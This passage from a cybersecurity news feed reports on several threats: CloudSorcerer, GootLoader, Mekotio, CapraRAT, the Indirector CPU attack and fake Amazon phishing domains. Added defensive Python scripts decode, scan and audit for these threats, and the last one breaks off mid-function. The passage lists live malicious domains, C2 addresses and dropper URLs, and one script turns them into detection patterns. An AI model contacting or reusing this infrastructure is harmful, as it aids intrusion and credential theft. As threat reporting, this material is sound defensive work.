The malware picks up hex strings from these sources and breaks them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service the malware should use: for example, a byte value of "1" represents Microsoft Graph and a byte value of "0" represents Yandex Cloud. The segments that follow form a string used to authenticate to the various cloud APIs, as well as a subset of functions for specific interactions with the selected cloud service.
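An analyst looking at a suspected dead-drop profile can automate the first decoding step described above. The script below is an added example, not Kaspersky's code or the malware's: it only reproduces the first-byte service selector the article gives ("1" for Microsoft Graph, "0" for Yandex Cloud), accepts both a raw byte and an ASCII digit because the article does not say which is used (an assumption), treats the rest as one opaque authentication string since the real segment layout is not published here, and runs on constructed sample text.

```python
"""Pull hex strings out of free text (e.g. a GitHub profile author field or a
photo album name) and decode the first byte as the cloud-service selector.

Only the first byte is documented in the article. Whether it is raw 0x00/0x01
or ASCII '0'/'1' is not stated, so both are accepted (assumption). The rest
is reported as a single opaque string; the real segment layout is not
reproduced. All sample inputs are CONSTRUCTED.
"""
import re
import string

# Raw and ASCII forms of the documented selector values (assumption, see above).
CLOUD_SELECTORS = {
    0x00: "Yandex Cloud", ord("0"): "Yandex Cloud",
    0x01: "Microsoft Graph", ord("1"): "Microsoft Graph",
}

# Even-length runs of at least 16 hex digits, not touching other hex characters.
# Shorter runs are too likely to be ordinary words or numbers.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){8,}(?![0-9A-Fa-f])")


def find_hex_blobs(text):
    """Return every candidate hex string embedded in the text."""
    return HEX_RUN.findall(text)


def decode_dead_drop(hex_blob):
    """Split one hex blob into the selected cloud service and the remaining payload."""
    raw = bytes.fromhex(hex_blob)
    if not raw:
        raise ValueError("empty blob")
    service = CLOUD_SELECTORS.get(raw[0], "unknown (0x%02x)" % raw[0])
    payload = raw[1:]
    # Printable payloads are shown as text; anything else stays hex so no
    # byte is silently dropped from the analyst's view.
    if payload and all(chr(b) in string.printable for b in payload):
        payload_str = payload.decode("ascii")
    else:
        payload_str = payload.hex()
    return {"service": service, "payload": payload_str}


def triage_profile_text(text):
    """Decode every hex blob found in a profile field."""
    return [dict(hex=blob, **decode_dead_drop(blob)) for blob in find_hex_blobs(text)]


# Constructed author field: selector 0x01 followed by a placeholder token string.
SAMPLE_AUTHOR_FIELD = (
    "Backend engineer. 01" + "Bearer-token-placeholder".encode().hex() + " | open source"
)

if __name__ == "__main__":
    for finding in triage_profile_text(SAMPLE_AUTHOR_FIELD):
        print(finding)
```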

Similarity to CloudWizard APT Campaign

While the researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that significant differences in the code and functionality of the malware used by the two groups suggest that CloudSorcerer is likely the work of a newer APT developing its own tools. The CloudSorcerer campaign represents a sophisticated operation against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware's ability to adapt its behavior dynamically to the process it is running in, along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.

GootLoader Malware Evades Detection Through Complicated Loops and Time-Based Delays

By: Alan J
5 July 2024 at 17:26

GootLoader Evasive Techniques Time

GootLoader, a sophisticated JavaScript-based malware, has continued to confound cybersecurity experts with its unique evasion techniques. However, researchers have found a way to circumvent its anti-analysis methods by debugging it as Node.js code in Visual Studio Code. The research casts new light on the malware's inner workings and highlights flaws in common sandbox-based analysis methods.

Debugging GootLoader's Evasive Techniques

While it is common for malware to perform sleep operations by calling the Wscript.sleep() or setTimeout() methods, most malware sandboxes easily detect these 'malware sleeping' techniques. GootLoader, however, employs time-based delays built from loop iterations, a more effective evasion that can trick most sandbox environments.
[Figure: Debugging GootLoader Malware. Source: unit42.paloaltonetworks.com]
Gootkit was first identified in 2014 and has undergone many changes over time. The original Gootkit malware consisted of a Windows executable, but since 2020 JavaScript-based variants named Gootkit Loader have been distributed through fake forum posts. GootLoader can be used to deliver several other types of malware, including ransomware. Despite these changes, the group has retained the same distribution tactics in 2024, with the forum posts nearly identical in content and appearance.
Researchers from Palo Alto Networks analyzed a GootLoader sample by debugging it as Node.js code in Visual Studio Code on a Windows host. This approach allowed step-by-step code execution and breakpoint setting, providing deeper insight into the malware's control flow and execution logic than typical standalone execution. The analysis revealed that the malware uses time-consuming while loops and array functions to deliberately delay execution of its malicious code, creating self-induced sleep periods that obscure its true nature. The researchers observed an infinite-loop function that repeatedly assigned the same value to a variable and, stepping further into the code, found an array function named 'horseq7'. The code appeared to be stuck in a loop, as it took over 10 minutes for the function to reach the required counter value within the analysis environment.
This function appeared to be where the malicious program actually began execution, with the researchers identifying several different counter values and their respective functions.
[Figure: GootLoader malware. Source: unit42.paloaltonetworks.com]

Flaws Within Sandbox Testing in Security Environments

Sandboxing techniques are commonly employed by security researchers to identify malicious binaries and observe their behaviour and execution with the benefit of a controlled environment. These sandbox environments can face hurdles such as having to process large volumes of binaries with limited resources. GootLoader's intricate evasive techniques present further hurdles for sandbox environments, particularly those with severely limited computing resources and time-constrained analysis. Understanding these techniques is crucial for researchers to develop more effective detection and analysis methods, such as enhanced sandbox environments that can handle time-based evasion tactics and more sophisticated static and dynamic analysis tools that can detect such evasive functions.

Europol Faces 'Serious Challenge for Lawful Interception' With Mobile Roaming Networks

By: Alan J
5 July 2024 at 12:38

Europol Details Home Routing

Europol's recent paper sheds light on the formidable challenges posed by Privacy Enhancing Technologies (PET) in Home Routing systems. These technologies, aimed at safeguarding user privacy, inadvertently hinder law enforcement agencies (LEAs) from intercepting communications originating from foreign SIM cards. Home Routing allows service providers to continue providing services to paying customers after they have travelled abroad. This limitation not only impedes investigations involving foreign nationals but also complicates cases where citizens use foreign SIM cards domestically. The new paper details how this technology could potentially delay or even prevent lawful access to evidence in serious criminal cases.

Europol Details Home Routing Intervention Challenges

The Europol paper states that the core issue lies in the implementation of Privacy Enhancing Technologies (PET) within Home Routing in telecommunication networks. When PET is enabled, the visited network cannot access the encryption keys used by the home network, making it impossible to retrieve unencrypted data. This creates a roadblock for LEAs, as they can no longer intercept communications from foreign SIM cards without cooperation from the home country's service provider. The inability to intercept communications from foreign SIM cards affects not only investigations of foreign nationals but also cases involving citizens using foreign SIM cards in their own country. This limitation extends beyond simple inconvenience:
  • LEAs become dependent on cooperation from service providers in the suspect's home country.
  • Domestic interception orders can't be enforced across borders.
  • European Investigation Orders, while available, can take up to 120 days – too long for urgent cases.
These challenges stem from the disparity between the European single market, which allows service providers to operate across borders while law enforcement still remains limited by national jurisdictions.

Proposed Solutions to Home Routing

To address these issues, potential solutions must balance maintaining investigatory powers with protecting secure communications and the confidentiality of criminal investigations. The solutions outlined in the paper range from disabling Privacy Enhancing Technologies (PET) in Home Routing networks to creating a new legal framework that allows domestic law enforcement agencies to request the interception of a suspect's communications in the territory of another EU member state, coupled with a common interface to apply these laws and regulations across borders. The paper details these two potential approaches:
1. Legally mandating the disabling of PET in Home Routing:
  • Maintains current security levels and law enforcement capabilities
  • Allows domestic service providers to execute interception orders for foreign SIM cards
  • Technically feasible and easily implemented
  • Preserves privacy at the same level as communication via national SIM cards
2. Enabling cross-border interception requests:
  • Allows LEAs to request interception from service providers in other EU member states
  • Maintains PET for all users
  • Requires development of cross-border standards and interfaces
  • May compromise operational security by revealing persons of interest to foreign entities
The paper admits that the success of these solutions will depend on the cooperation of telecommunication service providers, law enforcement agencies and national authorities. These challenges accentuate the critical importance of developing a solution that balances the need for European law enforcement agencies to access data with the need to protect the privacy and security of individuals within the region. Earlier, in 2019, the European Council raised the need to address and mitigate potential challenges to law enforcement agencies from the deployment of 5G networks and services. In the paper titled 'The significance of 5G to the European Economy and the need to mitigate security risks linked to 5G', the Council stressed the need to "address and mitigate potential challenges arising from the deployment of 5G networks and services to law enforcement including e.g. lawful interception."

Cybercriminals Prepare Fake Domains Ahead of Amazon Prime Day

By: Alan J
5 July 2024 at 09:36

Amazon Prime Day Domains

As online shoppers ready themselves for the approaching Amazon Prime Day on July 16-17, 2024, a day known for unusually extensive deals and exclusive offers, cybercriminals appear ready to lure potential victims. Researchers observed an increase in new domains that incorporated the use of the Amazon brand over the last month, with the vast majority of these found to be suspicious and designed to steal sensitive information such as login credentials, payment details, and personal data from victims.

Amazon Prime Day Fake Domains

Researchers from Check Point observed the registration of over 1,230 such domains during June 2024, with 85% of these domains flagged as malicious or suspicious. These domains pose a significant threat to shoppers' personal and financial information. The researchers identified phishing activity, deceptive emails and malicious file attachments:
  • Fake Domains: Newly created Amazon-impersonating domains that mimic various legitimate Amazon Mexico websites to trick users into providing sensitive information. Examples of these fake domains include: amazon-onboarding[.]com, amazonmxc[.]shop, amazonindo[.]com, shopamazon2[.]com, microsoft-amazon[.]shop, amazonapp[.]nl, shopamazon3[.]com and amazon-billing[.]top.
  • Distribution of malicious phishing files over alleged payment failures: Phishing campaigns use urgent language to prompt immediate action. One such attempt claimed a payment failure for an Amazon Prime Video order, directing users to a fraudulent login page.
[Figure: Amazon Prime Day 2024. Source: blog.checkpoint.com]
Some attacks distribute files with misleading names like "Mail-AmazonReports-73074[264].pdf," containing false alerts about account suspension in order to steal payment details. The file lures victims by creating a false sense of urgency, informing them that their Amazon account has been suspended due to mismatched billing information and instructing them to update their payment details through a provided phishing link: trk[.]klclick3[.]com. The message within the file threatens account closure if immediate action is not taken, stoking fears of account termination or loss of access to services.
[Figure: Amazon Prime Day. Source: blog.checkpoint.com]

Staying Safe With Online Shopping During Amazon Prime Day

According to a report on the Global State of Scams by the Global Anti-Scam Alliance, consumers lost over USD $1 trillion globally in 2023. The researchers behind the recent study have shared the following tips to help online shoppers stay safe during the Amazon Prime Day sales:
  • Scrutinize URLs for misspellings or unusual domain extensions.
  • Use strong, unique passwords for your Amazon account.
  • Verify website security by looking for "https://" and the padlock icon.
  • Be wary of requests for excessive personal information.
  • Approach urgent emails with caution and verify their legitimacy.
  • Trust your instincts about deals that seem too good to be true.
  • Use credit cards for better fraud protection when shopping online.
A customer trust report from Amazon in March of this year indicated that over two-thirds of observed scams purported to be order or account issues. A paraphrased customer quote within the report stated:
"I got a random call from someone who claimed I bought something on Amazon that I hadn't and they wanted my account information to verify this was an error."
Amazon maintains a dedicated email address, reportascam@amazon.com, for customers to report scams. In 2023, the e-commerce giant took down over 40,000 phishing websites and 10,000 phone numbers. Amazon also partners with organizations such as the Better Business Bureau (BBB), the Anti-Phishing Council in Japan, Microsoft and several cross-industry investigative groups to collaborate on and add depth to the scam reports it collects from customers. It is unknown whether Amazon is taking any specific action against scams that claim association with the Amazon Prime Day event.

Researchers Observe Surge in Use of Mekotio Banking Trojan Against Latin American Financial Systems

By: Alan J
4 July 2024 at 22:11

Mekotio Banking Trojan Against Latin America

The Mekotio banking trojan has resurfaced as a significant threat to financial institutions and individuals across Latin America. The Mekotio malware, active since 2015, has primarily been used against a persistent set of target countries such as Brazil, Chile, Mexico, Spain and Peru, with the aim of stealing sensitive information such as banking credentials. Mekotio shares similarities with other Latin American banking malware, such as Grandoreiro, whose operations were recently disrupted by law enforcement.

Mekotio Infection and Operation

Researchers from Trend Micro noticed an uptick in the use of the Mekotio malware across campaigns. The researchers stated that Mekotio typically infiltrates systems through phishing emails purporting to be communications from tax agencies. These messages often claim the recipient has unpaid tax obligations while embedding malicious ZIP file attachments or links that download and execute the malware on the victim's system.
[Figure: Mekotio Banking Trojan. Source: trendmicro.com]
Once activated, Mekotio gathers system information and establishes a connection with a command-and-control server. The malware performs the following operations on infected systems:
  • Credential theft: Mekotio displays fake pop-ups mimicking legitimate banking sites to trick users into entering their login details.
  • Information gathering: The trojan captures screenshots, logs keystrokes and steals clipboard data.
  • Persistence: Mekotio employs tactics like adding itself to startup programs or creating scheduled tasks to maintain its presence on infected systems.
Several security researchers have investigated previous campaigns involving the use of the Mekotio malware, often noting it as a geolocation-specific Trojan. A threat summary from Microsoft Security Intelligence states, "The Mekotio Trojan evades detection using a malicious DLL that executes using DLL sideloading, since the DLL and executable loading the DLL is dropped in the same folder. The folder is the first location where an executable searches for a loading module to help execute the malicious dropped DLL before reaching the original DLL." The page also notes that victims may be restricted from accessing legitimate banking websites after infection.

Prevention and Mitigation Against Mekotio

The researchers have advised the maintenance of proper practices to combat threats such as Mekotio. These include:
  • Being skeptical of unsolicited emails and verifying the sender's email address.
  • Avoiding clicking on links and downloading attachments unless absolutely certain of the sender's identity.
  • Verifying sender identity by contacting the sender through known contact details.
  • Using email filters and anti-spam software, and ensuring they are up to date.
  • Reporting phishing attempts to IT and security teams when applicable.
  • Educating employees on security best practices, including phishing and social engineering tactics.
The researchers also shared the following potential indicators of compromise.
File hashes (SHA-1):
  • 5e92f0fcddc1478d46914835f012137d7ee3c217
  • f68d3a25433888aa606e18f0717d693443fe9f5a
  • 3fe5d098952796c0593881800975bcb09f1fe9ed
  • 1087b318449d7184131f0f21a2810013b166bf37
  • ef22c6b4323a4557ad235f5bd80d995a6a15024a
C&C servers:
  • 23[.]239[.]4[.]149:80
  • 68[.]233[.]238[.]122:80
  • 34[.]117[.]186[.]192:80
  • 68[.]221[.]121[.]160:9095
  • 68[.]221[.]121[.]160:80
  • tudoprafrente[.]org
  • tudoprafrente[.]co:7958
Download URLs:
  • hxxps://intimaciones[.]afip[.]gob[.]ar[.]kdental[.]cl/Documentos_Intimacion/
  • hxxps://techpowerup[.]net/cgefacturacl/descargafactmayo/eletricidad/
  • hxxps://christcrucifiedinternational[.]org/descargafactmayo/eletricidad/
By adhering to these guidelines, maintaining vigilance and scrutinising possible attack indications, organizations and individuals can significantly reduce their risk of falling victim to the Mekotio banking trojan.
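Published indicators are only useful once they are refanged and run against real telemetry. The script below is an added example written for this page, not code from Trend Micro or from the report: it takes the indicators exactly as listed above, undoes the `[.]`/`hxxps` defanging, and sweeps a constructed proxy log for connections to the C&C servers (including the right host on an unexpected port) and fetches of the dropper URLs. The log format (`timestamp client method target`) and the sample lines are assumptions made up for the demonstration; the SHA-1 check is included because the published hashes are 40 hex characters, which is SHA-1 length.

```python
"""Match the published Mekotio indicators against constructed proxy logs and file hashes."""
import hashlib
import re
from urllib.parse import urlsplit

# Indicators as published in the report (defanged). Nothing else below comes from the report.
MEKOTIO_SHA1 = {
    "5e92f0fcddc1478d46914835f012137d7ee3c217",
    "f68d3a25433888aa606e18f0717d693443fe9f5a",
    "3fe5d098952796c0593881800975bcb09f1fe9ed",
    "1087b318449d7184131f0f21a2810013b166bf37",
    "ef22c6b4323a4557ad235f5bd80d995a6a15024a",
}
MEKOTIO_C2 = [
    "23[.]239[.]4[.]149:80",
    "68[.]233[.]238[.]122:80",
    "34[.]117[.]186[.]192:80",
    "68[.]221[.]121[.]160:9095",
    "68[.]221[.]121[.]160:80",
    "tudoprafrente[.]org",
    "tudoprafrente[.]co:7958",
]
MEKOTIO_DOWNLOADS = [
    "hxxps://intimaciones[.]afip[.]gob[.]ar[.]kdental[.]cl/Documentos_Intimacion/",
    "hxxps://techpowerup[.]net/cgefacturacl/descargafactmayo/eletricidad/",
    "hxxps://christcrucifiedinternational[.]org/descargafactmayo/eletricidad/",
]


def refang(indicator: str) -> str:
    """Undo the usual defanging so an indicator can be compared with real log data."""
    return (indicator.replace("[.]", ".")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))


def build_indicator_sets():
    """Return (hosts, (host, port) pairs, download URL prefixes) in refanged form."""
    hosts, host_ports = set(), set()
    for c2 in MEKOTIO_C2:
        host, _, port = refang(c2).partition(":")
        hosts.add(host)
        if port:
            host_ports.add((host, int(port)))
    urls = [refang(u) for u in MEKOTIO_DOWNLOADS]
    for u in urls:
        hosts.add(urlsplit(u).hostname)
    return hosts, host_ports, urls


# Assumed (constructed) proxy log format: "<timestamp> <client> <method> <url-or-host:port>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def scan_proxy_log(lines):
    """Return one (line_no, reason) tuple per log line that touches a Mekotio indicator."""
    hosts, host_ports, urls = build_indicator_sets()
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _, _, method, target = m.groups()
        if method == "CONNECT":
            host, _, port = target.rpartition(":")
            if not host or not port.isdigit():
                continue
            if (host, int(port)) in host_ports:
                hits.append((n, f"C2 {host}:{port}"))
            elif host in hosts:
                hits.append((n, f"C2 host {host} on unexpected port {port}"))
        else:
            hostname = urlsplit(target).hostname
            if any(target.startswith(u) for u in urls):
                hits.append((n, f"dropper download {hostname}"))
            elif hostname in hosts:
                hits.append((n, f"C2 host {hostname}"))
    return hits


def sha1_matches(data: bytes) -> bool:
    """True when the SHA-1 of the bytes is one of the published file hashes."""
    return hashlib.sha1(data).hexdigest() in MEKOTIO_SHA1


# Constructed sample lines; lines 2 to 5 each touch a published indicator, line 1 is benign.
SAMPLE_LOG = [
    "2024-07-04T10:22:31Z 10.0.0.15 GET https://www.example.com/index.html",
    "2024-07-04T10:23:02Z 10.0.0.15 GET https://intimaciones.afip.gob.ar.kdental.cl/Documentos_Intimacion/",
    "2024-07-04T10:25:40Z 10.0.0.15 CONNECT 68.221.121.160:9095",
    "2024-07-04T10:26:11Z 10.0.0.22 CONNECT 68.221.121.160:443",
    "2024-07-04T10:27:00Z 10.0.0.22 GET http://tudoprafrente.org/",
]

if __name__ == "__main__":
    for n, why in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {why}")
```

The host-level match on an unexpected port is deliberate: operators rotate ports on the same server far more often than they rotate servers, so matching only the exact `host:port` pairs would miss line 4 of the sample.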

Hacker Shares Data Allegedly Stolen From Shopify Breach

By: Alan J
4 July 2024 at 16:08

Shopify Data Breach

A known threat actor on BreachForums who uses the moniker '888' has shared data allegedly stolen from Shopify in a data breach incident. The data is claimed to consist of personal details, email subscriptions and order-related information of its users. Shopify Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations that allow individuals, retailers and other businesses to set up their own online stores or retail point-of-sale websites.

Alleged Shopify Data Breach

The Shopify data breach post claims to contain 179,873 rows of user information. These records allegedly include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates.
[Image: Shopify data breach post. Source: BreachForums]
The Cyber Express could not verify the authenticity of these claims, but the threat actor has a high-ranking reputation within the BreachForums community that has earned him the title of 'Kingpin.' The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built into the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards.
[Image: Shopify Data Breach / Evolve Bank and Trust. Source: X.com (@lvdeeaz)]

Recent Evolve Bank and Trust Data Breach

Towards the end of June, Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers (SSNs), dates of birth, and account details, among other data. In an official statement in response to the Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).” Later, the financial firm Affirm Holdings confirmed that it had also been affected by the Evolve Bank and Trust data breach. The firm stated in a security notice on its website, "Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more."
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Transparent Tribe’s Android Spyware Targets Gamers and Weapons Enthusiasts

By: Alan J
2 July 2024 at 21:06

Transparent Tribe

A Pakistan-linked hacking group has unleashed an updated version of its Android spyware, expanding its reach to target mobile gamers, weapons enthusiasts and TikTok users, according to cybersecurity researchers. The researchers identified four new malicious Android apps associated with Transparent Tribe, a group suspected of ties to Pakistani state interests. The apps continue the hackers' strategy of embedding spyware into seemingly innocuous video browsing applications.

Evolving Tactics of Transparent Tribe

Transparent Tribe, also known as APT 36, has targeted Indian government and military personnel since at least 2016. The group is known to rely heavily on social engineering to deliver Windows and Android spyware through phishing emails and compromised websites. Researchers from SentinelLabs identified the newly discovered apps masquerading as YouTube or TikTok video players, an app for lewd videos, a mobile gaming portal, and a weapons enthusiast app. When installed, they request extensive permissions to access the device's location, contacts, SMS messages, call logs, camera and microphone.
[Image: CapraTube. Source: sentinelone.com]
[Image: Tactics of Transparent Tribe. Source: sentinelone.com]
While the permissions requested are similar to those in the previous campaign, the reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool more than a fully featured backdoor. Researchers noted that the new CapraRAT APK files contained references to Android's Oreo version (Android 8.0), released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and is less likely to be compatible with modern Android devices. The new CapraRAT packages also contain a minimal new class called WebView, responsible for maintaining compatibility with older versions of Android via the Android Support Library. This update allows the app to run smoothly on modern versions of Android, such as Android 13 and 14. All four newly discovered apps communicate with the same command-and-control server, using either the domain shareboxs[.]net or a hardcoded IP address. This infrastructure has been linked to Transparent Tribe operations since at least 2022.

Researcher Recommendations

Cybersecurity experts recommend that users exercise caution when installing apps, especially those from unofficial sources. Users should critically evaluate requested permissions and be wary of apps that ask for access unrelated to their stated purpose. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. Organizations dealing with sensitive information should implement mobile device management solutions and educate employees about the risks of installing unauthorized apps. The researchers have advised professionals to treat the use of port 18582 as suspect, along with the other indicators of compromise in their report, such as SHA1 checksums for files used in the campaign and domain/IP network indicators.
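The "permissions unrelated to the stated purpose" test can be automated at the manifest level. The following is an added example written for this page, not SentinelLabs' tooling or anything from the CapraRAT samples: it parses a decoded `AndroidManifest.xml` (what `apktool` or `androguard` produce from the binary AXML; decoding itself is out of scope here), diffs the requested permissions against an assumed baseline for a plain video-browsing app, and maps the excess onto the surveillance capabilities the report attributes to CapraRAT. It also reads `minSdkVersion`, since API level 26 is Android 8.0 Oreo, the version the report says the new packages reference. The baseline set and the sample manifest are constructed assumptions.

```python
"""Flag permissions that a self-described video-player app has no reason to request."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumed baseline for a plain video-browsing app (an assumption, not from the report).
VIDEO_PLAYER_BASELINE = frozenset({
    "android.permission.INTERNET",
    "android.permission.ACCESS_NETWORK_STATE",
    "android.permission.WAKE_LOCK",
})

# Permissions behind the surveillance capabilities the report attributes to CapraRAT.
SURVEILLANCE_CAPABILITY = {
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.ACCESS_COARSE_LOCATION": "location",
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.SEND_SMS": "SMS",
    "android.permission.READ_CALL_LOG": "call logs",
    "android.permission.CALL_PHONE": "calls",
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
}


def requested_permissions(manifest_xml: str) -> set:
    """Return the android:name of every <uses-permission> element in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(f"{{{ANDROID_NS}}}name") for el in root.iter("uses-permission")}


def min_sdk(manifest_xml: str):
    """Return android:minSdkVersion from <uses-sdk>, or None when the manifest omits it."""
    sdk = ET.fromstring(manifest_xml).find("uses-sdk")
    if sdk is None:
        return None
    value = sdk.get(f"{{{ANDROID_NS}}}minSdkVersion")
    return int(value) if value is not None else None


def audit(manifest_xml: str, baseline=VIDEO_PLAYER_BASELINE) -> dict:
    """Compare requested permissions with the baseline for the app's stated purpose."""
    excess = requested_permissions(manifest_xml) - set(baseline)
    capabilities = sorted({SURVEILLANCE_CAPABILITY[p] for p in excess if p in SURVEILLANCE_CAPABILITY})
    return {
        "min_sdk": min_sdk(manifest_xml),
        "excess_permissions": sorted(excess),
        "surveillance_capabilities": capabilities,
        # Any surveillance-grade permission on a "video player" is a block, not a warning.
        "verdict": "reject" if capabilities else "review",
    }


# Constructed decoded manifest for a "video browser" that over-reaches (not a real sample).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.videobrowser">
  <uses-sdk android:minSdkVersion="26" android:targetSdkVersion="33"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application android:label="Video Browser"/>
</manifest>
"""

if __name__ == "__main__":
    for key, value in audit(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

In an MDM or app-vetting pipeline the baseline would be chosen per declared app category; the point of the check is that the decision is made against what the app claims to be, not against what Android is willing to grant.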

Researchers Uncover New β€˜Indirector’ CPU Vulnerability in Intel Chips

By: Alan J
2 July 2024 at 18:35

'Indirector' CPU Vulnerability

Security researchers have identified a novel side-channel attack that can compromise the security of modern Intel CPU variants, including Raptor Lake and Alder Lake. The attack, dubbed Indirector, leverages weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and steal sensitive information from processors. The IBP is a critical hardware component in modern CPUs that predicts the target addresses of indirect branches. Indirect branches are control flow instructions whose target address is computed only at runtime, making them challenging to predict accurately. Attacks using Branch Target Injection (BTI) have been the focus of extensive research since the disclosure of the Spectre and Meltdown attacks in 2018.

Indirector CPU Vulnerability

The Indirector attack developed by University of California San Diego researchers exploits weaknesses in Intel CPUs to launch precise Branch Target Injection (BTI) attacks. Attackers can use a custom tool called the iBranch Locator to locate any indirect branch and then perform precision-targeted IBP and BTB injections to execute speculative code. This allows attackers to steal sensitive information from the processor using a side-channel attack.
[Image: Indirector CPU Vulnerability. Source: indirector.cpusec.org]
This tool enables two high-precision attacks:
  • IBP Injection Attack: Locates and injects arbitrary target addresses into victim IBP entries.
  • BTB Injection Attack: Injects malicious targets into the victim's BTB entry, misleading it through BTB prediction.
These attacks can potentially bypass existing defenses and compromise system security across various scenarios, including cross-process and cross-privilege situations. The paper states that while Intel already offers several mitigations to protect the BTB and IBP from different types of target injection attacks, such as Indirect Branch Restricted Speculation (IBRS), Single Thread Indirect Branch Predictors (STIBP) and the Indirect Branch Predictor Barrier (IBPB), these defenses were found to be inadequate and did not always live up to their advertised goals. The researchers expressed surprise at finding remaining attack surface despite these measures. The research paper makes three main contributions:
  • The paper presents the first major analysis of the Indirect Branch Predictor and its interaction with the Branch Target Buffer in recent Intel processor families. The paper details the size, structure, and precise indexing and tagging hash functions.
  • The paper analyzes the mitigation mechanisms (IBRS, STIBP and IBPB) on Intel CPUs designed to protect against BTB and IBP target injection attacks.
  • The paper demonstrates the iBranch Locator as an efficient tool capable of locating any indirect branch within the IBP without requiring prior data on the branch. The paper highlights that by using this tool, attackers can successfully break address space layout randomization.

Intel Indirector Mitigations

For current Intel processors, the researchers recommend more aggressive use of the Indirect Branch Predictor Barrier (IBPB). For future CPU designs they suggest finer-grained Branch Prediction Unit (BPU) isolation across security domains, hardening the BPU through more complex tags, encryption and randomization. The researchers disclosed their findings to Intel in February 2024 and stated that Intel had informed other affected hardware and software vendors about the vulnerability. The discoveries underscore the importance of ongoing scrutiny of hardware components and the need for chip manufacturers to continually improve their designs to stay ahead of potential threats. The authors thanked anonymous reviewers for helpful suggestions on the research paper.
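The practical question for an operator is whether IBPB and STIBP are actually in use on a given host, and in which mode. The script below is an added example written for this page, not from the Indirector authors or Intel: it parses the Linux kernel's `/sys/devices/system/cpu/vulnerabilities/spectre_v2` status line and the `flags` line of `/proc/cpuinfo` and reports gaps in branch-target-injection coverage. The exact wording of the status line varies across kernel versions, so the parser splits on both `;` and `,` and only looks for `IBPB:` and `STIBP:` fields; the sample strings are constructed, and the mapping of "conditional" IBPB to "only tasks that opted in via prctl/seccomp" follows the kernel's own Spectre documentation.

```python
"""Inspect the Linux kernel's reported Spectre-v2 (branch target injection) mitigation state."""
import re
from pathlib import Path

SPECTRE_V2_SYSFS = Path("/sys/devices/system/cpu/vulnerabilities/spectre_v2")
CPUINFO = Path("/proc/cpuinfo")


def parse_spectre_v2(status: str) -> dict:
    """Split the sysfs status line into the overall mode and the IBPB / STIBP settings.

    The kernel joins the fields with ';' or ',' depending on version, so both are
    accepted; the first field is the mode (e.g. 'Mitigation: Retpolines' or 'Vulnerable').
    """
    fields = [f.strip() for f in re.split(r"[;,]", status.strip()) if f.strip()]
    state = {"mode": fields[0] if fields else "", "ibpb": None, "stibp": None}
    for field in fields[1:]:
        for key in ("IBPB", "STIBP"):
            if field.upper().startswith(key + ":"):
                state[key.lower()] = field.split(":", 1)[1].strip()
    return state


def cpu_flags(cpuinfo_text: str) -> set:
    """Collect the CPU feature flags from /proc/cpuinfo text (first 'flags' line only)."""
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            return set(line.split(":", 1)[1].split())
    return set()


def assess(status: str, cpuinfo_text: str) -> list:
    """Return human-readable findings about BTI mitigation coverage on this host."""
    st = parse_spectre_v2(status)
    flags = cpu_flags(cpuinfo_text)
    eibrs = "ibrs_enhanced" in flags or st["mode"].startswith("Mitigation: Enhanced")
    findings = []
    if st["mode"].startswith("Vulnerable"):
        findings.append("kernel reports spectre_v2 as Vulnerable")
    for feat in ("ibpb", "stibp"):
        if feat not in flags:
            findings.append(f"CPU does not advertise {feat.upper()}")
    if not eibrs:
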